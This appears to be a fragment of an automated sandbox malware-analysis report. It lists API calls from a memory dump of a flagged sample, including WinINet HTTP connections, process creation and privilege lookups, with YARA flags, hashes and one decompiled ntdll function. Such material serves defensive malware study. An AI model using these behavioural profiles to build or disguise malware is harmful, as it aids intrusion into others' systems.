                                                                                    • API ID: HttpRequestSend
                                                                                    • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                                    • API String ID: 360639707-2503632690
                                                                                    • Opcode ID: 55845fd566111ad21366918098eff5cb6164c89f91251d9ce2bd53093292cd91
                                                                                    • Instruction ID: 1724b8c5366e9b9dfa0a50940fc1a853e06d5d13afce8466def2cbf9f01be176
                                                                                    • Opcode Fuzzy Hash: 55845fd566111ad21366918098eff5cb6164c89f91251d9ce2bd53093292cd91
                                                                                    • Instruction Fuzzy Hash: 55017CB2905109AFDB00DF88C841AAF7BB8EB59240F508148FD18AB304D670DE00CBF2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00DA88B8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ConnectInternet
                                                                                    • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                                    • API String ID: 3050416762-1024195942
                                                                                    • Opcode ID: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
                                                                                    • Instruction ID: d1a1eeaef6e6d76a0ffc6ed079dfaa9ca43c37f4bd73321977556f339e35af8b
                                                                                    • Opcode Fuzzy Hash: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
                                                                                    • Instruction Fuzzy Hash: D2010CB2905118AFCB14DF99D941EEF77B9EB48310F154289FE08A7241D630EE10CBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00DA88B8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ConnectInternet
                                                                                    • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                                    • API String ID: 3050416762-1024195942
                                                                                    • Opcode ID: 82f5ff5c5cbe2073e9236b952e3d370d6472ab244483b1843478c32671d2100a
                                                                                    • Instruction ID: e8a06be3612bd344b1d87e771f0389118ff5165a125adaff4d7b9dcef61e649c
                                                                                    • Opcode Fuzzy Hash: 82f5ff5c5cbe2073e9236b952e3d370d6472ab244483b1843478c32671d2100a
                                                                                    • Instruction Fuzzy Hash: 6D0129B2905119AFCB14DF99DD40EEF7BB9FF49350F158288BA48A7241C630AE11CBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00DA8837
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InternetOpen
                                                                                    • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                    • API String ID: 2038078732-3155091674
                                                                                    • Opcode ID: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
                                                                                    • Instruction ID: 66d4004f2b66adab517a5751334d97202e53050edb027f959a7a7094b3075f94
                                                                                    • Opcode Fuzzy Hash: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
                                                                                    • Instruction Fuzzy Hash: 3DF019B2901118AF8B14DF98DC419EBB7B8FF48310B048589BE1897301D635AE10CBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00DA8837
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InternetOpen
                                                                                    • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                    • API String ID: 2038078732-3155091674
                                                                                    • Opcode ID: b19e08ff7fd6ea0d40064051c8d38ae74b6ac2ad4a63c6a1664fe906beace06d
                                                                                    • Instruction ID: 66a1f035735ce33513d54f6e1bc593432a4ff4b929f3ac2624597d88fcb93e51
                                                                                    • Opcode Fuzzy Hash: b19e08ff7fd6ea0d40064051c8d38ae74b6ac2ad4a63c6a1664fe906beace06d
                                                                                    • Instruction Fuzzy Hash: D6F019B2901219AF8B14DF98D8419AB7BB8FF48300F048589BE1867346D734AA10CBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000007D0), ref: 00DA6F88
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID: net.dll$wininet.dll
                                                                                    • API String ID: 3472027048-1269752229
                                                                                    • Opcode ID: dcdc39c7c6c693788b8ef11d0ded37d5dd7c33f95ecf2803788eda0e636ba227
                                                                                    • Instruction ID: 3afae40c45cbdc349b0c55ab91bd5cd1f5ef880eaface8ec088cc615b7eb8bdc
                                                                                    • Opcode Fuzzy Hash: dcdc39c7c6c693788b8ef11d0ded37d5dd7c33f95ecf2803788eda0e636ba227
                                                                                    • Instruction Fuzzy Hash: 28318FB1602704ABC715DF68D8A1FA7B7B8EF49700F04851DF61A9B241D770E545CBB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000007D0), ref: 00DA6F88
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID: net.dll$wininet.dll
                                                                                    • API String ID: 3472027048-1269752229
                                                                                    • Opcode ID: 29f1d006ad9d3f596608b8163a9e89bcf7be4a1d60b714708bffffb01765c3c3
                                                                                    • Instruction ID: 1a89789b1877422c3323d17ed6cb19a8a1620b0c15589645724482b25019d3c4
                                                                                    • Opcode Fuzzy Hash: 29f1d006ad9d3f596608b8163a9e89bcf7be4a1d60b714708bffffb01765c3c3
                                                                                    • Instruction Fuzzy Hash: 8621BDB1602300AFC710DF68D8A1FAABBB4EF49700F08806DF6199B241D370E545CBB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00D93B93), ref: 00DA84FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID: .z`
                                                                                    • API String ID: 3298025750-1441809116
                                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                    • Instruction ID: 8416629027582beee0c276389bb1a981da8c289670a797d402af73d86ff9c20c
                                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                    • Instruction Fuzzy Hash: C4E04FB12002046FDB14DF59CC45EA777ACEF88750F014554FD0857241CA30F910CAF0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00D972BA
                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00D972DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    • Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                    • Instruction ID: 2e0e9a35ea9b68ccd44dc9d23e863d9fec2f364c2398f4c3f879ed5b1c557d33
                                                                                    • Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                    • Instruction Fuzzy Hash: F701A231A9122876EB20A6949C43FFEB76C9B41B50F550119FF04BA1C1E6A46A0687F6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00D972BA
                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00D972DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    • Opcode ID: a48fa8f18b87730ac951628d4debb36c2350a33053462d418bcc864ffe104e1f
                                                                                    • Instruction ID: ed81e986861e133c01e56bf8579887aa01831f35b2da50d43901be0802a94140
                                                                                    • Opcode Fuzzy Hash: a48fa8f18b87730ac951628d4debb36c2350a33053462d418bcc864ffe104e1f
                                                                                    • Instruction Fuzzy Hash: 2AF0E931AA52243AEB2457545C03FBEB758EB80B11F18412EFE84A91C1E695590586F5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00D9CCD0,?,?), ref: 00DA704C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2422867632-0
                                                                                    • Opcode ID: a147266c3b11a3828ef28e38813cc07779aa21fca741a0448e6d1dbd002c37d9
                                                                                    • Instruction ID: ae19e6b922e90d53dfe559939eece48616924dafd8cd3fd3dfb6de307d3c3f7a
                                                                                    • Opcode Fuzzy Hash: a147266c3b11a3828ef28e38813cc07779aa21fca741a0448e6d1dbd002c37d9
                                                                                    • Instruction Fuzzy Hash: F94188B2201705AFD325DB64CCA2FE7B3A9EF86394F484919F51A96281D770B815CBB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00D99B92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                    • Instruction ID: 5acfd4e4e1897bd97d1d4a9750df3c761671fea8fc8d68781fc93b820425f66b
                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                    • Instruction Fuzzy Hash: BA011EB5D0020DABDF10DAA4EC92F9DB7B89B54308F044195A90897241F635EB14CBB1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00DA8594
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateInternalProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2186235152-0
                                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                    • Instruction ID: 00c71bf8af7a5e2626d0c34e80dfacfa87fae4fdcb3e5d73f1ca3ef25e4a8dde
                                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                    • Instruction Fuzzy Hash: 9B01AFB2210108AFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241CA30E851CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,00D9CFA2,00D9CFA2,?,00000000,?,?), ref: 00DA8660
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LookupPrivilegeValue
                                                                                    • String ID:
                                                                                    • API String ID: 3899507212-0
                                                                                    • Opcode ID: f3d0d4816f2cdbc92c373190ca66973c238335d4b5fe0e9a71cc65d7bc131487
                                                                                    • Instruction ID: 0ea99d178af4ac96f3c9cf722974935666a351263fa09982a173f6029959e53b
                                                                                    • Opcode Fuzzy Hash: f3d0d4816f2cdbc92c373190ca66973c238335d4b5fe0e9a71cc65d7bc131487
                                                                                    • Instruction Fuzzy Hash: 9DF06DB62002486FDB24EFA5DC84EEB7BADEF89350F148659FD4D97641C931E9108BB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00D9CCD0,?,?), ref: 00DA704C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2422867632-0
                                                                                    • Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                                                    • Instruction ID: 154f0d8c7dc20c04de97750535b783515002b6739dcf5687be6bb3d072491121
                                                                                    • Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                                                    • Instruction Fuzzy Hash: 63E092333903043AE33065999C03FA7B39DDB82B20F540026FB0DEB2C1D599F90142B8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00D972DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    • Opcode ID: ea492a0dd7fa0d4bcf416ebe9217e1cd75a044e1415e850f8fd52b4d56661e89
                                                                                    • Instruction ID: ddb9cd285b10cf91a84a1eb10144639fef7e13c9e766c30f44a77ff09348ec42
                                                                                    • Opcode Fuzzy Hash: ea492a0dd7fa0d4bcf416ebe9217e1cd75a044e1415e850f8fd52b4d56661e89
                                                                                    • Instruction Fuzzy Hash: 00E02B253A525429FB106799EC12FFE3788E763B52F88026EF9C4C62C2E585510D57F1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00DA3516,?,00DA3C8F,00DA3C8F,?,00DA3516,?,?,?,?,?,00000000,00000000,?), ref: 00DA84BD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                    • Instruction ID: 1e893e555dbf409c4cec9437d8c89a1161303cb8133fec4f04b14ca6dcde0f1b
                                                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                    • Instruction Fuzzy Hash: 57E012B1200208ABDB14EF99CC41EA777ACEF88650F118558FE085B282CA30F9108AB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,00D9CFA2,00D9CFA2,?,00000000,?,?), ref: 00DA8660
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LookupPrivilegeValue
                                                                                    • String ID:
                                                                                    • API String ID: 3899507212-0
                                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                    • Instruction ID: ec98957492427c93dfd10ed0e899b84aec0d4cf1e0db401ec627a0ed0bde494b
                                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                    • Instruction Fuzzy Hash: 5DE01AB16002086BDB10DF59CC85EE737ADEF89650F018554FE0857241C930E8108BF5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,00D97C63,?), ref: 00D9D43B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                    • Instruction ID: 02718a3d65ab92f5300575e4caf477e7a9fdae097a9e12ed195454aef32961af
                                                                                    • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                    • Instruction Fuzzy Hash: 51D0A7717503083BEB10FBA89C03F2672CD9B55B00F494064F949D73C3D964F5004571
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 664e9463eb97b26c5efa9a490095c8c473584baf995525ae3d7eaa8b3bd71ec3
                                                                                    • Instruction ID: 7885085b840e7ae63a4fca60af42254be878645718b485aaabbf1d0beab1bab0
                                                                                    • Opcode Fuzzy Hash: 664e9463eb97b26c5efa9a490095c8c473584baf995525ae3d7eaa8b3bd71ec3
                                                                                    • Instruction Fuzzy Hash: F4B09BB1D414C5C5F715D7614608B17794077D0745F17C051D2031641B4778D096F5B5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    C-Code - Quality: 53%
                                                                                    			E04FAFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                    				void* _t7;
                                                                                    				intOrPtr _t9;
                                                                                    				intOrPtr _t10;
                                                                                    				intOrPtr* _t12;
                                                                                    				intOrPtr* _t13;
                                                                                    				intOrPtr _t14;
                                                                                    				intOrPtr* _t15;
                                                                                    
                                                                                    				_t13 = __edx;
                                                                                    				_push(_a4);
                                                                                    				_t14 =  *[fs:0x18];
                                                                                    				_t15 = _t12;
                                                                                    				_t7 = E04F5CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                    				_push(_t13);
                                                                                    				E04FA5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                    				_t9 =  *_t15;
                                                                                    				if(_t9 == 0xffffffff) {
                                                                                    					_t10 = 0;
                                                                                    				} else {
                                                                                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                    				}
                                                                                    				_push(_t10);
                                                                                    				_push(_t15);
                                                                                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                    				return E04FA5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                    			}










                                                                                    0x04fafdda
                                                                                    0x04fafde2
                                                                                    0x04fafde5
                                                                                    0x04fafdec
                                                                                    0x04fafdfa
                                                                                    0x04fafdff
                                                                                    0x04fafe0a
                                                                                    0x04fafe0f
                                                                                    0x04fafe17
                                                                                    0x04fafe1e
                                                                                    0x04fafe19
                                                                                    0x04fafe19
                                                                                    0x04fafe19
                                                                                    0x04fafe20
                                                                                    0x04fafe21
                                                                                    0x04fafe22
                                                                                    0x04fafe25
                                                                                    0x04fafe40

                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04FAFDFA
                                                                                    Strings
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04FAFE2B
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04FAFE01
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                    • API String ID: 885266447-3903918235
                                                                                    • Opcode ID: 4439762dcffcb46e9cb251b999aac2be5317c375b3b24069abba0b63bb49e5a0
                                                                                    • Instruction ID: 0a7c3062b557dfad5cf6a383260f20d763bd8a4b3751f680e1f11824201a2135
                                                                                    • Opcode Fuzzy Hash: 4439762dcffcb46e9cb251b999aac2be5317c375b3b24069abba0b63bb49e5a0
                                                                                    • Instruction Fuzzy Hash: 69F0F6B2600201BFEA201A45DC46F33BF5AEB84730F254315F6285A1E1EA62FC3196F4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%